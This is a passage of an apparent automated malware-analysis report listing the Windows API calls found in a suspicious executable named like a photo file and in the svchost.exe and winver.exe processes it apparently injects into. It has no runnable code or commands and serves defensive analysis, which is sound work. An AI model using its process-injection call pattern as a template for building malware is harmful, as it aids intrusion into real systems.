                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C60 NtCreateKey,1_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C70 NtFreeVirtualMemory,1_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873090 NtSetValueKey,1_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D70 NtOpenThread,1_2_03873D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD4650 NtSuspendThread,LdrInitializeThunk,6_2_04AD4650
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD4340 NtSetContextThread,LdrInitializeThunk,6_2_04AD4340
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04AD2CA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2C60 NtCreateKey,LdrInitializeThunk,6_2_04AD2C60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04AD2C70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04AD2DF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04AD2DD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04AD2D30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04AD2D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04AD2E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04AD2EE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2FB0 NtResumeThread,LdrInitializeThunk,6_2_04AD2FB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2FE0 NtCreateFile,LdrInitializeThunk,6_2_04AD2FE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2F30 NtCreateSection,LdrInitializeThunk,6_2_04AD2F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2AF0 NtWriteFile,LdrInitializeThunk,6_2_04AD2AF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2AD0 NtReadFile,LdrInitializeThunk,6_2_04AD2AD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04AD2BA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04AD2BE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04AD2BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2B60 NtClose,LdrInitializeThunk,6_2_04AD2B60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD35C0 NtCreateMutant,LdrInitializeThunk,6_2_04AD35C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD39B0 NtGetContextThread,LdrInitializeThunk,6_2_04AD39B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2CF0 NtOpenProcess,6_2_04AD2CF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2CC0 NtQueryVirtualMemory,6_2_04AD2CC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2C00 NtQueryInformationProcess,6_2_04AD2C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2DB0 NtEnumerateKey,6_2_04AD2DB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2D00 NtSetInformationFile,6_2_04AD2D00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2EA0 NtAdjustPrivilegesToken,6_2_04AD2EA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2E30 NtWriteVirtualMemory,6_2_04AD2E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2FA0 NtQuerySection,6_2_04AD2FA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2F90 NtProtectVirtualMemory,6_2_04AD2F90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2F60 NtCreateProcessEx,6_2_04AD2F60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2AB0 NtWaitForSingleObject,6_2_04AD2AB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD2B80 NtQueryInformationFile,6_2_04AD2B80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD3090 NtSetValueKey,6_2_04AD3090
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD3010 NtOpenDirectoryObject,6_2_04AD3010
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD3D10 NtOpenProcessToken,6_2_04AD3D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD3D70 NtOpenThread,6_2_04AD3D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_008591F0 NtCreateFile,6_2_008591F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_00859360 NtReadFile,6_2_00859360
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_008594F0 NtClose,6_2_008594F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_00859450 NtDeleteFile,6_2_00859450
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_00859660 NtAllocateVirtualMemory,6_2_00859660
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7D588: CreateFileW,DeviceIoControl,CloseHandle,0_2_00D7D588
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D71145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D71145
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7E814 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00D7E814
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D781EE0_2_00D781EE
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1E3F00_2_00D1E3F0
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D4E4A00_2_00D4E4A0
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D466FB0_2_00D466FB
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00DA47A80_2_00DA47A8
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D3CA300_2_00D3CA30
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1AB300_2_00D1AB30
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D2ADFD0_2_00D2ADFD
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D46D790_2_00D46D79
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D192A00_2_00D192A0
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D2D3B50_2_00D2D3B5
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D313240_2_00D31324
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D316960_2_00D31696
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D377AB0_2_00D377AB
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D2B7280_2_00D2B728
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D199D00_2_00D199D0
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D379DA0_2_00D379DA
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D319400_2_00D31940
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D31C070_2_00D31C07
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D37C370_2_00D37C37
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D9BD6B0_2_00D9BD6B
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D31EC20_2_00D31EC2
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D49E8E0_2_00D49E8E
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D2BEAD0_2_00D2BEAD
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D81F640_2_00D81F64
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_012388820_2_01238882
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_01237E900_2_01237E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418AD31_2_00418AD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F0431_2_0042F043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E8271_2_0040E827
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029951_2_00402995
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029A01_2_004029A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032E61_2_004032E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032F01_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004104431_2_00410443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041043B1_2_0041043B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416D231_2_00416D23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402DE01_2_00402DE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004106631_2_00410663
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026C01_2_004026C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E6E31_2_0040E6E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026BE1_2_004026BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E95B9F5_2_02E95B9F
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E95B975_2_02E95B97
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E93E3F5_2_02E93E3F
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E93F835_2_02E93F83
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02EB479F5_2_02EB479F
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E9C47F5_2_02E9C47F
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E95DBF5_2_02E95DBF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B4E4F66_2_04B4E4F6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B444206_2_04B44420
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B524466_2_04B52446
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B605916_2_04B60591
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA05356_2_04AA0535
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ABC6E06_2_04ABC6E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A9C7C06_2_04A9C7C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA07706_2_04AA0770
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AC47506_2_04AC4750
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B320006_2_04B32000
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B541A26_2_04B541A2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B601AA6_2_04B601AA
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B581CC6_2_04B581CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A901006_2_04A90100
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B3A1186_2_04B3A118
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B281586_2_04B28158
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B202C06_2_04B202C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B402746_2_04B40274
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B603E66_2_04B603E6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AAE3F06_2_04AAE3F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5A3526_2_04B5A352
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B40CB56_2_04B40CB5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A90CF26_2_04A90CF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA0C006_2_04AA0C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AB8DBF6_2_04AB8DBF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A9ADE06_2_04A9ADE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AAAD006_2_04AAAD00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B3CD1F6_2_04B3CD1F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5CE936_2_04B5CE93
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AB2E906_2_04AB2E90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5EEDB6_2_04B5EEDB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5EE266_2_04B5EE26
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA0E596_2_04AA0E59
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B1EFA06_2_04B1EFA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A92FC86_2_04A92FC8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B42F306_2_04B42F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AE2F286_2_04AE2F28
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AC0F306_2_04AC0F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B14F406_2_04B14F40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A868B86_2_04A868B8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ACE8F06_2_04ACE8F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA28406_2_04AA2840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AAA8406_2_04AAA840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA29A06_2_04AA29A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B6A9A66_2_04B6A9A6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AB69626_2_04AB6962
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A9EA806_2_04A9EA80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B56BD76_2_04B56BD7
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5AB406_2_04B5AB40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5F43F6_2_04B5F43F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A914606_2_04A91460
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B3D5B06_2_04B3D5B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B695C36_2_04B695C3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B575716_2_04B57571
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B516CC6_2_04B516CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AE56306_2_04AE5630
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5F7B06_2_04B5F7B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5F0E06_2_04B5F0E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B570E96_2_04B570E9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA70C06_2_04AA70C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B4F0CC6_2_04B4F0CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AAB1B06_2_04AAB1B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AD516C6_2_04AD516C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A8F1726_2_04A8F172
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B6B16B6_2_04B6B16B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA52A06_2_04AA52A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B412ED6_2_04B412ED
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ABD2F06_2_04ABD2F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ABB2C06_2_04ABB2C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AE739A6_2_04AE739A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5132D6_2_04B5132D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A8D34C6_2_04A8D34C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5FCF26_2_04B5FCF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B19C326_2_04B19C32
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ABFDC06_2_04ABFDC0
